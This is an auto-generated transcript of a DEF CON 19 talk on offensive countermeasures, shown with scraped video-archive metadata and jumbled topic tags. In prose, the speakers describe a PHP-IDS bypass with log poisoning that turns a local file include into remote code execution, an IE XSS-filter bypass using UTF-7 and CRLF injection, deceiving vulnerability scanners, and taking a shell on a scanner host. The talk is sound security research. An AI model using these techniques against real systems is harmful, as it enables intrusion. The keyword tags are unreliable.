Traps of Gold
This is a modal window.
The media could not be loaded, either because the server or network failed or because the format is not supported.
Formal Metadata
Title |
| |
Title of Series | ||
Number of Parts | 122 | |
Author | ||
License | CC Attribution 3.0 Unported: You are free to use, adapt and copy, distribute and transmit the work or content in adapted or unchanged form for any legal purpose as long as the work is attributed to the author in the manner specified by the author or licensor. | |
Identifiers | 10.5446/40537 (DOI) | |
Publisher | ||
Release Date | ||
Language |
Content Metadata
Subject Area | ||
Genre | ||
Abstract |
|
DEF CON 19106 / 122
3
5
10
11
12
22
23
24
30
31
32
38
43
46
47
49
51
54
56
59
60
62
71
73
76
84
85
88
92
93
96
97
98
104
106
109
112
113
115
119
00:00
Data managementRootWiener filterFamilyMultiplication signFlagMetric systemRight angleProof theoryNumberIntegrated development environmentFlow separationVulnerability (computing)Information securityThresholding (image processing)Group actionAttribute grammarSoftwareMeeting/InterviewComputer animation
01:24
Maxima and minimaVulnerability (computing)Directory serviceContent (media)CodeData typeHeat transferServer (computing)Software bugInformation securityMereologyMultiplication signComputer programmingProduct (business)
02:04
Total S.A.Proxy serverStatisticsFunction (mathematics)Intrusion detection systemCodeInformation securityIntrusion detection systemCartesian coordinate systemMeeting/InterviewComputer animation
02:35
Proxy serverTotal S.A.Intrusion detection systemCodeInformation securityKolmogorov complexityFunction (mathematics)StatisticsFluid staticsDot productMatching (graph theory)CodeString (computer science)Remote procedure callPoint (geometry)Firewall (computing)outputComputer fileCartesian coordinate systemVulnerability (computing)Total S.A.Web applicationOrder (biology)AlgorithmPhysical systemLocal ringMultiplication signSound effectRule of inferenceIntrusion detection systemComputer wormPlastikkarteRegulärer Ausdruck <Textverarbeitung>CurvatureCoprocessorRight angleWaveTransport Layer SecurityFile systemComputer animation
04:12
Information securityKolmogorov complexityPhysical systemHacker (term)Information securityComplex (psychology)Computer animationMeeting/Interview
04:42
Information securityKolmogorov complexityWeb browserBitOperating systemMusical ensemblePlug-in (computing)Ferry CorstenWeb applicationFilter <Stochastik>Vulnerability (computing)Suite (music)InternetworkingScripting languageExploit (computer security)Water vaporTwitterGraphical user interfaceSound effectSoftware developerCartesian coordinate systemFirewall (computing)Web 2.0Information securitySoftware testingStructural load
06:22
WindowInclusion mapSoftware developerRight angleAttribute grammarInjektivitätInternetworkingWeb browserDependent and independent variablesType theoryCodeSymbol tableWebsiteWeb pageException handlingWeb applicationHeegaard splittingCuboidGodPoisson-KlammerPoint (geometry)Web 2.0Source codeComputer animation
08:21
Right angleNegative numberVideo gameInternetworkingInformation securityRule of inference2 (number)Patch (Unix)Proxy serverNeuroinformatikPoint (geometry)Semiconductor memoryFrustrationSoftware bugSoftware developerSlide ruleCodeStrategy gameFilter <Stochastik>Cycle (graph theory)Product (business)Data managementWeb browserPhysical systemCartesian coordinate systemComputer animationMeeting/Interview
10:34
CodeProduct (business)Right anglePhysical systemPatch (Unix)Information extractionDrag (physics)Remote procedure callGastropod shellWindowInternetworkingVideo gameMultiplication signGame theoryVulnerability (computing)Drop (liquid)Cycle (graph theory)Computer animationMeeting/Interview
12:15
ModemTerm (mathematics)Patch (Unix)Data managementRight angleSoftware bugRegular graphProduct (business)Information securitySoftware developerComputer animation
12:48
Data managementPatch (Unix)Process (computing)Strategy gameSoftware developerCartesian coordinate systemFirewall (computing)QuicksortGoodness of fitLogic gateAntivirus softwareCycle (graph theory)Regular graphTwitterProduct (business)Information securityPhysical systemSoftwareMultiplication signLaptopExploit (computer security)MeasurementPunched cardWeb applicationSoftware bugNeuroinformatikInheritance (object-oriented programming)10 (number)Video gameEndliche ModelltheorieTheoryAreaContext awarenessDenial-of-service attackHand fanRight anglePort scannerMaxima and minimaCapability Maturity ModelSemiconductor memoryOrder (biology)Connectivity (graph theory)Vulnerability (computing)Statement (computer science)Computer animationMeeting/Interview
17:13
Data miningComputer animationMeeting/Interview
17:54
Vulnerability (computing)ResultantLecture/ConferenceMeeting/Interview
18:36
Division (mathematics)InfinityNewton, IsaacExploit (computer security)System programmingIntrusion detection systemEndliche ModelltheorieStrategy gameRight angleIntrusion detection systemArithmetic meanInformationLine (geometry)Social engineering (security)Level (video gaming)Game theoryContent (media)Term (mathematics)Real numberWave packetPhysical systemInformation securityEndliche ModelltheorieArmNuclear spaceRevision controlVulnerability (computing)CASE <Informatik>AreaAttribute grammarComputer animation
21:35
Channel capacityCohesion (computer science)Decision theoryStrategy gameCore dumpConnectivity (graph theory)Right angleLoop (music)CASE <Informatik>
22:27
Menu (computing)Default (computer science)Computer fileExtension (kinesiology)Meta elementServer (computing)RoutingIntelMultiplication signOrder (biology)Task (computing)1 (number)CASE <Informatik>Information securityApplication service providerCanadian Mathematical SocietyDefault (computer science)Computer fileExtension (kinesiology)Process (computing)MereologyWeb browserServer (computing)MappingCartesian coordinate systemArithmetic meanSoftware developerSoftwarePlug-in (computing)Game controllerRight angleWeightProjective planeComputer animation
24:55
Right anglePlanningSet (mathematics)
25:30
CodeInjektivitätRight angleConnectivity (graph theory)Physical systemSequelPort scannerInformation securityWebsiteSoftware developerQuicksortVulnerability (computing)Directory serviceTraverse (surveying)FrequencySubject indexing2 (number)Web pageFlagMathematical analysisWeb browserVolumenvisualisierungSoftware testingRegular graphMultiplication signAlgorithmContent (media)WindowStrategy gameObservational studyPoint (geometry)Computer fileDefault (computer science)NeuroinformatikInstance (computer science)Dependent and independent variablesNoise (electronics)Position operatorDecision theorySlide ruleCrash (computing)IdentifiabilityResultantComputer animation
28:51
SequelInformationCartesian coordinate systemLie groupPhysical systemAttribute grammarMultiplication signCASE <Informatik>Point (geometry)Port scannerRight angleSpectrum (functional analysis)Game theorySoftware testingComputer fileBuildingDatabaseIntegrated development environmentField (computer science)Computer chessMobile appCuboidInjektivitätDecision theoryRoutingForm (programming)Existential quantificationExpected valueIntelReal numberComputer animation
30:42
Menu (computing)Observational studyPhysical systemDifferent (Kate Ryan album)Context awarenessWeightDecision theorySurfacePosition operatorIntrusion detection systemProcess (computing)Host Identity ProtocolArmExpert systemRoutingSimulationProjective planeRight angleProper mapComputer animation
32:19
Menu (computing)Endliche ModelltheorieCartesian coordinate systemProjective planeContext awarenessMobile appInjektivitätCodeHoaxError messagePoint (geometry)Remote procedure callGame theoryDenial-of-service attackBitLevel (video gaming)Performance appraisalSequelSoftware testingComputer animation
33:26
Meta elementPlanningCASE <Informatik>Port scannerContext awarenessRight angleResultantComputer animation
34:00
Menu (computing)Execution unitWeb browserPhysical systemOrder (biology)Web pageReading (process)Port scannerWeb 2.0Mechanism designIntelDynamical systemRight angleGradientContent (media)ResultantWindowKinematicsInstance (computer science)Goodness of fitReal numberIntegrated development environmentInformationLecture/Conference
35:11
Port scannerProduct (business)Web 2.0Web browserInternetworkingVulnerability (computing)Validity (statistics)Server (computing)Source codeRight angleExploit (computer security)MereologySurfaceComplex (psychology)AverageNumberTurbo-CodeSinc functionCASE <Informatik>Mobile WebMedical imagingComputer animationMeeting/Interview
37:11
Execution unitMenu (computing)CuboidEmailServer (computing)Physical systemRamificationCASE <Informatik>Validity (statistics)Letterpress printingVulnerability (computing)Web browserWeb 2.0NetzwerkverwaltungAttribute grammarVirtual machineArithmetic meanRight angleInformationSoftwareGroup actionProcess (computing)Computer animationLecture/Conference
38:50
Menu (computing)Information securityOvalRight anglePosition operatorGame theoryTerm (mathematics)Vulnerability (computing)
39:29
Meta elementMenu (computing)Computer animation
Transcript: English(auto-generated)
00:00
Okay, so hi, thank you for coming to our talk. This talk's entitled Traps of Gold. My name is Andrew Wilson. I work for Trustwave Spider Labs. I compete and capture the flags with these guys. I'm trained in martial arts for quite some time with these guys, and this is the family that supports me to make sure that I can be here and give talks like that with you guys.
00:20
So this talk is kind of in popular parlance, what some people would call offensive countermeasures, right? So offensive countermeasures, as defined by the paul.com group, includes things like annoyance, attribution, and then attack, right? So based on where you live inside of this threshold, it's probably to your best benefit to talk to somebody who is a legal advisor
00:42
about whether or not some of the things that we're gonna show you guys today are viable inside of the environment that you work in. Some of it's gonna be straightforward that you probably don't need to get permission for, and then other things you definitely wanna seek kind of legal counsel. This is just some proof of concept stuff to go from there.
01:01
My name is Michael Brooks, and I attack software. These are all the CVE numbers I've accumulated over the years. That CVE right there, CVE-0049, I just obtained my highest severity metric. So the Department of Homeland Security issues severity metrics
01:20
for the most serious vulnerabilities. This one right here received a severity metric of 25.2, which is in the top 500 of all time. I got it a part of the Mozilla bug bounty program, and I got their highest bounty of $3,000, and this sweet T-shirt.
01:40
But that's not why I'm talking about, that's not why I'm here today. The reason why I'm here today is because we have a problem. Our approach to security is flawed, and one of the problems that I found is in a product called PHP-IDS. This is the wrong fucking slide.
02:03
Oh, fuck, sorry. Okay, PHP-IDS is making an incorrect assumption, and the assumption, PHP-IDS is, what's nice about this intrusion detection system is that it is embedded into your application, so you can apply it in places that you wouldn't normally,
02:23
such as a GoDaddy shared hosting account. It's making an incorrect assumption in its security system, and that is that attacks can never be repetitive. This is the vulnerable piece of code.
02:44
Now, so we rely on web application firewalls. I mean, if you think of a secure website, one of the first things you say is like, well, you have a WAF, right? But the problem is is that WAFs can be bypassed, and a common problem with WAFs is the preprocessor. And what you're looking at right now is a method that's being called an all input.
03:02
And what it's looking at is it's looking at a regular expression, and this is saying, hey, I wanna match a wildcard, which is the dot. I wanna match two of those, at least two of those. And then I wanna match at least 32 more, so a total of 33 repeating. And if it finds a string that's repeating 33 times,
03:21
it replaces it with the letter X. So the significance of this is that I can hide any payload from the PHP IDS rulesets by repeating it 33 times. The effect is that I completely bypass PHP IDS entirely. Absolutely every rule set is bypassed.
03:40
But then I went a step further. Not only was I able to bypass it, I can intentionally trigger a rule set in order to populate its flat file logging system with PHP code. The significance of this is that once I have PHP code on the local file system, then I can turn any local file include vulnerability in the application into remote code execution.
04:02
So I said a lot. But the point is is that not only did I make, did I bypass the web application firewall entirely, I also made it less secure. So this is a great quote from Bruce Schneier. Complexity is the worst enemy of security. So if you're able to add complexity to a system and actually make it more secure,
04:22
well, that's quite a hack. That is not an easy, that is not easy. And here, let me demo it for you.
04:48
That wasn't the only thing I'm looking at. Today we're seeing a new trend. And that is we're starting to see XSS filters in web browsers. Internet Explorer was the first to introduce this, but other browsers are following suit.
05:01
In Firefox, there's the NoScript plugin, which has an anti-XSS filter. And also within Chrome is also beta testing. They're following their own XSS filter. It's safe to say that soon all web browsers, all major web browsers will have XSS filters. So the era of very simple XSS exploitation is starting to go away.
05:20
But instead, really these security systems, these general purpose security systems, it's not just web application firewalls or XSS filters and browsers, but also ASLR. These general purpose security systems create this kind of water balloon effect. The more they try and cramp down on the application, the vulnerabilities that are present
05:42
start bulging out in new and interesting ways. And although, Internet Explorer's loading. Takes a while. We were thinking about putting some whole music in here for you guys, but it doesn't turn out that way. Anyway, it turns out that,
06:01
so a bit of background. On the CD, I go into great detail about bypassing PHP-IDS in one of my papers. I highly recommend reading it. I go over a lot of my attack methodology. But after I submitted the paper to PHP-IDS, the developers were ecstatic. They were really happy about it.
06:21
And I'm actually now a member of their development team. I submitted a similar paper to Microsoft, Internet Explorer. And so I submitted a similar paper to Microsoft, right?
06:41
And basically it's this. I showed that, okay. So I found a problem with the way that Internet Explorer was handling UTF-7 characters. So it turns out, how this XSS filter is working is that it's looking at outgoing requests.
07:01
And it's looking specifically for brackets greater than, less than, symbols, and quote marks. If you can create a payload that doesn't contain any of these attributes, then it's possible to execute code. I found, execute JavaScript, rather. So I found a way. It turns out you can use UTF-7 encoding.
07:20
Now UTF-7 has a history where it's only for SMTP. It's not designed for HTTP at all. In fact, no browser except for Internet Explorer supports UTF-7 for web pages. But that's beside the point. I was able to, the real problem here is that their XSS filter is not accounting for this.
07:41
But okay, hold on. I said that no, UTF-7 is not for HTTP, right? Well, why, so then it means no website's going to be running it. Except there's a way. You can change the content type of a web app, of a page, using a CRLF injection,
08:01
or HTTP response splitting. And bam. And it allows you to get an alert box. Here, hold on.
08:30
The, sorry, technical difficulties. Yeah, memory. All right, I apologize. I was gonna show you a great masterpiece.
08:42
And that is that I was going to bypass both PHP IDS's built-in rule set for XSS and Internet Explorer's rule set for XSS in the exact same attack. That it is possible to bypass both filters on the browser and the server and be able to execute code, ultimately.
09:03
So it doesn't matter. It doesn't matter that we're adding all of these new filters if really the fundamental problem remains and that they can be bypassed, they can be fooled. So we need another approach. Screw slides. We could do it from memory. Okay, so why talk about all this, right? What's the point of explaining,
09:21
you know, really a bypass to PHP IDS, a bypass to Internet Explorer, is that these are supposed to be like defensive products that we're gonna be relying on for the security of applications. And kind of as Michael was pointing out, this is like, this system is stuff that we're gonna be relying on more and more as we get into the future, right? So you kind of saw a slide there for just two seconds before we crashed about frustration, right?
09:42
Is anybody here earnestly in the room think like the security development approach is working, right, we see the news every day. And some major company, some data breach, not just a small one, but a really large one comes into play and it hits people in pretty negative, impactual ways, right? So everybody's kind of getting hit with that.
10:01
And we feel that the ultimate reason for that is kind of our approach to dealing with security has been a quality issue, right? It's a bug. When you look at books that are in popular use today, stuff like the secure development life cycle for Microsoft and then secure code and some of the rugged movement stuff, we treat security issues literally as if they were a quality concern
10:21
and that's how we approach it, right? We took strategies to mitigate security issues like it was a bug, like it was a quality concern and that starts with patch management, right? So patch management takes an approach that says, you find a bug, it's in production, we've gotta fix it, so you write new code that fixes the abuse scenario
10:40
so that way you can actually go ahead and make it safe. But that tends to come with some baggage, right? The first problem is that if you have a bug inside of a production system, it's available for people to exploit it and if it's a known exploit, you run this patch window life cycle, right? Where Microsoft puts out a patch on patch Tuesday,
11:01
it's reverse engineered on Wednesday and then you have a time between that patch, that release, where anybody who hasn't updated on the availability of the release is still incredibly vulnerable, right? So there's definitely some issues with that approach and then you run into a secondary issue where the patch itself may not necessarily be something that actually fixes the issue.
11:21
It might be a temporary fix or it might be... There's also another problem. Really, the problems with IE's XSS filter are trivial to fix, it would take an afternoon. But they didn't even recognize it was a vulnerability. They won't even fix it, it's a constant problem. Back in 2004, there was an interesting vulnerability
11:41
that was released in IE, it was called the IE Drag and Drop Vulnerability, all right? It allowed, in the attack, the victim picks up a carrot and drags it, just as if it was a game. The only problem is that that's not a carrot, it's actually an executable on a remote share
12:00
and you're dragging it into your startup folder. You could get remote shell on Internet Explorer for two years and Microsoft said, that's not a vulnerability? Like, you've gotta be kidding me. Ultimately, they did patch it and even... So four years after this attack was, it wasn't until four years later that the term clickjacking was even coined. But it's recognizing that there's a problem
12:23
is an important step. Yeah, so patch management obviously was not ideal and everybody kind of knows that, right? Anybody who's done secure, regular development doesn't want bugs in production, right? Because bugs in production is no bueno. The problem with that is that we move forward.
12:43
We move forward to, here, let's just play it from here. So patch management, doo, doo, doo, doo, doo. Oh, and the computer crashed again. So I guess we're gonna do this whole thing from memory, that's fine.
13:01
No big deal. It is a Mac. Apparently it has not been watching enough TV. That's my theory. Okay, so screw my laptop. So SDLC, right? SDLC came out as a measure to say, hey, bugs in production, that's definitely not the way that you wanna go about doing this, right? Because inside of that system, was that?
13:20
Just try booting up again. Yeah, I'll try booting up again. Inside of that system, you wanna deal with it proactively, right? So you build it into your development life cycle. It becomes something that you have to deal with. It becomes an earlier system. You start defining it. You come up with quality gates. You do threat models. You work inside of the system and make sure that it works for what you're doing as your dev cycle.
13:40
And then at the end of the day, it's sort of a process of refinement, right? You try to reduce known vulnerabilities inside of the application. I'm a huge fan of Microsoft's SDLC, right? Despite the fact that it misses stuff, I think that it's the way that people ought to be taking a look at writing software, right? It's super mature, 10 years something of experience, lots of money, lots of manpower,
14:01
and perhaps even more importantly, it has executive buy-in to say you can't release insecure software, right? So it's a great approach, fantastic approach, right? But you still have Patch Tuesday, right? You still have bugs that do get out into the system. And so we gotta kinda question what advantage does this have? And how tenable is this as an end product for us, right?
14:23
So the final thing we throw out there as our solution to security is more bad software, right? I call it defects in defense, right? If we put more software like web application firewalls or we put protections like antivirus or regular firewalls in front of these things, they're gonna stop bad guys from doing bad things.
14:43
But kind of as we just shown earlier within the context of our actual attack component, you can bypass those things. And so when we rely on stuff like that, that definitely creates a situation for us that's pretty disadvantageous, right? It's not ideal. That's how we end up with the TSA, right?
15:02
You get groped for free in the airport, which is nice, right, admittedly, but does it make you any safer is kind of the question. And what about the backscatter security scanners, right? Like we spend tens of millions of dollars on a security system that can be defeated with pancakes. Like really, really, are we really doing this?
15:20
And this is at least the second time that breakfast has been used in an attack. The first, of course, being the Captain Crunch whistle. So clearly more research needs to be done in the area of breakfast-based exploitation. I'm just putting that out there. All right. So the question then really, this talk is not about all the stuff that's broken, right?
15:40
I wanna point out that these are difficulties that we face. It's the reality of writing software, and it's stuff that we need to continue to do. I think that's just security hygiene, right? It's the sort of stuff you do. You brush your teeth because you don't want bad breath, and ideally it makes you a better person. Even refinement, right, is good too, but none of these approaches actually stop you from getting punched in the face, nor do they really prepare you for that, right?
16:02
Like having clean teeth isn't a defensive countermeasure, in my opinion. And so we really think that the solution, or the answer here, is we need to start looking at strategies in which we can fight back against people, right? We wanna kick their ass, right? When I was working at a company a while ago, I used to tell developers they've gotta build their applications so they can take a punch.
16:21
I'm gonna change my statement. I think you need to build applications that punch people back, right? I think that needs to be the way we move down this road. So how do we do that, right? How do we build in systems for that? And that's, we leverage technology that already exists, PHP-IDS being one of those. We use Honeypot and Honeynet technologies,
16:41
and then we write exploits that are capable of taking advantage of the fact that software that's going to be attempting to hit you also is vulnerable to all the same things that we talked about before, right? They have bugs, they have weakness, they have problems. There's this phenomenal Twitter feed from Richard Batelich who said something great.
17:01
He said, it's not just because we have these glass built homes, it's because there's people throwing bricks at them, right? And that's what we need to deal with, is the brick throwers. Hacking against our systems and attacking these things, this is a human problem that manifests itself with technology.
17:28
Check this out. Hey, this is good, it works nice on mine.
18:00
Well, that was a nice idea, unless you can fix the mirroring for me too. We'll just move on. So they have the risk too, right? This is a human problem, and because it's a human problem, I think that's exactly where we attack people, right? We chase them in the places where they're human. Bad guys who are doing bad things against you,
18:21
they have things like ego and bias, and they think they're gonna get in, and when they find results, they're gonna try to exploit these results because they're basing it off of prior experience and prior knowledge. They have weaknesses in the sense that the tools that they're using are imperfect as well. And we'll just go from here.
18:41
And so we need to start focusing on strategies that take advantage of that, right? How do I move it down? All right, sweet, so we're about here. That's where we attack them. When we look at how we're gonna do that, we're gonna leverage stuff that other people have done, and that includes IDS systems, honeypots, exploits, and we're gonna put those together in a fashion
19:01
that we can trap people inside of our systems to create things like better attribution, shut down their tools so they ignore particular content areas, or in certain cases, just completely shut them down entirely. So the thing about lying, we're worried about China hacking into us, right? Well, we're worried about them
19:20
getting a leg up in business, but that's weak. China is being weak. If they have to rely on you to break into you to get a leg up, what happens if when they hack into you, you give them information that you want them to find, that you use that against them, that they steal a secret that you want them to have?
19:41
Something to think about. Right. If they can social engineer us, why can't we social engineer them, right? So people will take, say, potentially security hygiene is a way that you are fighting back to, right? They might say that. And I would kinda classify that as more of like a war of attrition, right? When you look at how people fight combat,
20:00
how they can compete in combat, there's really two strategies. There's an attrition-based model and then a maneuverability model, which is kind of a modern-day guerrilla warfare combined with some other things, right? And in a war through attrition, the idea is that I'm gonna gather as many resources as I possibly can and kinda who has the most arms wins, right? If they have four nuclear warheads,
20:21
I've gotta get 10, right? And then when they get 10, I've gotta come up with a better nuclear warhead, so then I'm kinda the winner, right? That approach is expensive because it costs to build it up. It's expensive because it costs to maintain these things. And then it's expensive in the sense that if you actually go toe-to-toe with these people, it's pretty deadly when you actually start talking about it
20:40
in real tangible terms of human life, right? But that's not actually how the bad guys are attacking us. They're taking an approach, whether conscious or unconscious, of maneuverability, right? It's like our good guys, our defensive line, wants to create a football team, right? So we get the very best football players we can find. We give them the best food. We work out with them in the best equipment.
21:02
We do the best training. And so they're the biggest and the baddest, right? And they're gonna shut down the offensive line. And when they show up to play the game, they're there to win, right? But in this case, the offensive lines like poison their food, they're sleeping with their girlfriends on the side, right? When they go to play the game, they've already broken in their house, stole all their money. That's how the bad guys are attacking.
21:20
They've set the stage up so that all the things you think you're doing that are to your advantage end up being to your weakness, right? They're not gonna play your game because your game is designed so you can win, right? So they play their game and they make you play their game as a means to shut you down, right? And so if we look at strategies, I think the people that we wanna look to is people who are actually fighting
21:41
in a capacity to do that. And in this case, we've kind of based a model off of the United States Marine Corps. So maneuverability, just kind of at a historical reference comes from a gentleman primarily known as John Boyd. I don't know if you're familiar with the OODA loop, but he's kind of the guy who is behind that. And he's definitely behind maneuverability, right?
22:00
Maneuverability as core is doctrine says, we aim to shatter the cohesion of our opponents so they can't make decisions in a timely manner while we gain strategic advantage and basically obliterate them, right? We're gonna use their stuff against them, we're gonna stack the deck in our own favor. This strategy is based off of three major components,
22:20
right? The first being ambiguity, the second being deception, and the third ultimately being tempo, right? Ambiguity is this idea that if there's more than one way to accomplish a task, we should try to find a route that makes it very un-obvious what we're actually doing, right? If we go ahead and say I have a destination and there's four different ways that I might possibly get there,
22:41
from a pure resourcing perspective, if you're trying to provide intel about how somebody does something, you need four times the resources in order to monitor each one of the possible ones, because presumably you don't know where they're going, right? That's the value of ambiguity. But that's not how we build apps. We build our applications like they're billboards, right? We're proud of the fact that we wrote it in Java,
23:01
or we're proud of the CMS that we built it on, or we're proud of all the developers who were involved, that's why we leave dev comments all over the place, right? And we make it as if, hey, not only am I going to this destination, but here's how I'm gonna get there, here's who I'm taking along with me, and here's all the gear that I'm gonna be packing with it, right? And so some of the ways we see that
23:21
are server banners, where we tell people what we're running. Oftentimes you don't need those, right? It's not of any value to stuff, and when you start measuring that against things like the Shodan project, or when people are doing Google dorks, when they find an exploit in a CMS or something that you might be using, those are pretty compelling reasons that you might not want to actually sit around and tell people that stuff, right? File extensions,
23:41
your browser doesn't care about file extensions. If you send them HTML back, for the most part your browser is fine. So unless you have a use case where you have different mappings for how the file extension comes back, that's mostly a server side processing issue, and in most cases you can completely disable that and not say, hey, I've got PHP, or hey, I'm running ASP.net, or hey, I'm running Ruby, right?
24:01
Those are things that are unnecessary. And then finally, default files, right? I was working on a CMS a couple weeks ago, and they had some default control examples for developers, and it says, hey, this is how you write software using our stuff, it's installed by default, and it's of advantage, right? But the problem is that these control examples
24:20
were bound to the top node of the CMS, so they could look at every single part of the application with unauthenticated access. So from a default control example that was left enabled, you could completely bypass the majority of security in the entire CMS off of a default file, right? So these are most often unnecessary, and in fact, these are some of the things that when you start looking at things like June-Scan,
24:42
or CMS Explorer, or any of the tools that are based around fingerprinting, they're gonna be using these tools as a means to identify how you've built your application, what plugins you've got enabled, and how they might actually go about attacking them. So if knowing's half the battle, you should shut up, right? That's what this is about, it's not, you just don't be so obvious
25:01
about everything you're doing, and that's kind of the first step, right? So the next step is deception, and this is where we kinda get into the fun stuff. Deception's about lying, right? We're gonna convince people that we're doing stuff that we're not in fact planning on doing at all, right? Instead of saying, hey, I'm going to this destination, everybody plans and gets themselves situated to do that,
25:20
don't go to that destination, right? Set them up to do it, it's a trap, or maybe you set up ways that if you go to that destination, you're gonna get ambushed as you get there. And there's a couple of ways that we might go about doing that. Reduce the things that they can know, we lie about everything else, and we could do that by increasing the noise, we can blatantly lie about stuff. And if I had a computer to show you,
25:41
I've been able to trigger every single vulnerability that's identified through major security tools, like NIC2, for instance. I can trigger 54,000 or 5,400 vulnerabilities inside of it. If you scan my site, I could tell you every single thing is valid, right? So how do you figure out which one of those is valid if you're trying to scan my system
26:01
and try to identify components in it? In PHP-IDS, I added a system of triggers. So when a particular rule set is hit, let's say it's a blind SQL injection test, and they're trying to get us to sleep for 30 seconds. Well, when I see an incoming request, a PHP-IDS flags it, and then I look at it,
26:21
I'm like, well, how long do they want me to sleep for? I pull it out with a regular expression and sleep for that period of time. This fools every scanner. Another thing, what happens if they're trying to use directory traversal, and they're trying to grab like, slash, etc, psswd? Well, we'll just print out that file, that's fine. It's a fake, it's not the actual file. The same thing goes for Windows files,
26:41
like trying to get win.ini. And the point is that it's easy to fool. These tools are trusting. They're not planning on someone lying to them, and so they're easy to manipulate. So I actually have a slide in the one that doesn't crash where this isn't like to pick on NIC2, right? NIC2 is just an example of a tool
27:00
that we use to do this, but we've been able to actually trigger false positives on just about every major scanner, commercial or uncommerical, on the industry today. We can lie to them, we can subvert their ability to make cognizant decisions because ultimately when it boils down to it, is they have this pseudo-responsibility of being safe, right? They don't want to shut you down, which means they're not gonna exploit stuff
27:21
that they find. And if they don't exploit stuff, they're just collecting evidence and saying, hey, it kind of sort of looks like this. So you might as well lie about the evidence and make sure that it happens. A secondary issue with this kind of a corollary is how these things work, oftentimes they make developer mistakes. If you put together like a scanner or a tool and return a 404,
27:41
oftentimes developers use these things as like a null check, right? I hit a webpage, if I get a 404, it means there's no content, so why bother scanning it, right? Well, the problem is that your browser actually doesn't care about what the status code comes back. It'll render that content anyways. And so one of the ways you could actually evade content being discovered is if you take and return 404s for all your 200s,
28:01
it makes most scanners disappear by default and they can't identify stuff inside of it. It's actually really trippy if you're using a popular scanning tool that everybody uses in the industry or for regular work and you try to spider off the index, it actually makes the entire webpage disappear because as it's finding stuff, it says 404, 404, 404,
28:21
and so you can't rely on it for results. They don't get included when you try to do other more advanced analysis against it because as far as the tool is concerned, the content doesn't exist at all, right? So that's not necessarily gonna fool people. That's just a design strategy to say, hey, these tools are running automation against us, which in and of itself is pretty bad because if you think of the impervious study
28:42
that just came out and you are getting scanned once every two minutes, maybe shutting down the scanner's ability to do that would probably be to your advantage. So people, right? This is a people problem and kind of as Mike was pointing out, some of the lies are a lot better than other things. When you get into forensics and you're trying to understand what happens inside of an application,
29:00
the only way that you're gonna be able to really understand it is to start exploiting it and get information back out and if you can create a scenario where like he was talking about, you're getting back the files that you're looking for. You're getting back the blind SQL injection that you're expecting. Everything is working along the testing route that you've already prepared yourself to do. Why would you believe that's not valid? Why would you give it up and say,
29:21
hey, maybe something's wrong? Personally, I think I'd probably spend a really long time trying to figure out what I'm doing wrong as opposed to thinking, hey, maybe they're lying to me, right? But then it can take it a step further. Like why can't I seed my application with trip wiring? Why can't I create form fields inside of my app that do absolutely nothing other than if you tamper this,
29:42
I know you're tampering with stuff, right? Then you put that inside of a secondary database that's isolated just like you would a honeypot and you can actually let them exploit it. You can let them run the full broad spectrum completely isolated away from your production environment but while you're doing this, you're building attribution. You're building a case against them. You know at this point it's probably not a scanner anymore
30:02
and it's probably somebody exploiting your system and you actually have a case that if you wanna build this attribution for prosecution later, you've created better information, better intel about what they're doing against you, right? And that leads into tempo. Tempo is about initiative. A lot of people think of pace or tempo, they think speed.
30:21
And maneuverability does have some concepts based in speed. If I can overwhelm you by creating and putting forth a greater effort before you can start actively making real decisions about it, I'm pretty likely to win. If anybody compete in any games like chess, go, any things like that, boxing, you never win if you play their game, right? You can't win if you play their game.
30:40
You have to take initiative and you have to keep it the entire way through which means you can't be relying on reaction. You have to be relying on awareness and then proper decision making. There was a study that came out a couple of years ago where they had junior tennis players and then advanced tennis players and they were measuring reaction speeds to see who was faster, you know, kinda make some notices between them
31:00
and they found that the difference was actually fairly nominal in the context of overall reaction. But where the juniors were failing and where the expert players were exceeding is that the junior player would wait until the ball was hit before they start making decisions about where to go. Whereas the senior people were doing things like watching where the shoulder was moving or how their hips were turning
31:21
and how their arm was coming up and they were getting intel quicker into that process so they could make better decisions and they weren't relying on reaction. They weren't relying on trying to catch up. They were changing the pace to their own advantage and using that as a way to decision against people and do it so that's something that we need to do that. And if we build a system like we're talking about where it has IDS systems inside of it
31:43
that are creating a bunch of false positives, effectively embedded honey nets, you can create a perceived attack surface that's completely different than the actual surface of attack inside of your system, right? So as people are going down this route, you've already gotten visibility into the fact that they're doing bad things against you. If you feed this into a sim or ideally a project
32:02
that lets you create better decisions against it, you can then use these things to create a scenario where you can decide how you want to respond, right? You can kick them out of your system, you can shut them down or you can potentially attack them as we get to it, right? So, yeah. That's where I think the AppSensor project, right?
32:22
The OWASP AppSensor project actually has a lot of value with the stuff that Michael Coates is working on is that application has to be embedded in the context of awareness as to what's going on inside of it which is why we chose PHP-IDS as our base model for this because it lives inside of the application. One thing you can do when you're living inside an application
32:41
is you can see how it's reacting. So one thing is to shut down blind SQL injection tests, we can sleep. But what about error-based detection, okay? So we could give them fake error messages, but what if they trigger a real error? Like what happens if they trigger a MySQL error in our application or even worse, like an eval error? Like they're trying to evaluate PHP code. Well, when we get to that level, we can shut down.
33:03
We know that they've broken something critical in the application and we can kill the application, right? A kill bit and if that kill bit exists, then do not run. And the point is that, yeah, okay, this would turn, this is now a denial of service attack, right? But it's a hell of a lot better than remote code execution. You can go back and fix that. So we're not playing the game.
33:22
We know that you've gotten too far and we can shut down. So how do we put this all together, right? That's the real question and we love it when a plan comes together, of course. And so we talked about misdirection with the 404s. We've talked about shutting down tools, scanners, completely invalidating the results. And in some cases, as we were hitting scanners,
33:41
we can just crash the scanner remotely by accident, right? At least one or two major scanners that we've hit this with, we've actually been able to stop the scanner from working completely inside of that so we can increase awareness as to what was going on. But the real question is can we attack people with the scanner or through the scanner?
34:00
And I think yes, we can. All right, what you're looking at is a very unpatched Windows XP VM running Acunetix. Right now, we'll, anyway. So I wanna be careful here and I don't definitely want
34:20
this not on the news to read Oday and Acunetix. It's actually, this attack is not based on Acunetix. This is an attack based on the fact that Acunetix is many other web scanners on the market. When they're trying to parse information, you wanna do that well. The only real way to do that is to use an embedded browser or to use the browser that's on the system because you need to execute JavaScript, you need to execute the HTML in order
34:41
to get a real clear picture. For instance, little things like if they have Ajax requests on the page and content comes back dynamically. If all you're doing is an HTTP GET and then parsing the results back out, because there's no dynamic execution environment, you'll never see any of that content, right? So commercial grade scanners or particularly advanced scanners, good scanners, quite frankly,
35:01
they're gonna be using this as a mechanism to gather intel about what's going on. So let's pop this. So you should attack them exactly in that spot. Ah. That kind of pop, all right.
35:21
Okay, so actually what I was doing was scanning Metasploit. And hopefully, and now there's a shell. You notice it popped it in web vulnerability scanner seven so it popped just fine.
35:40
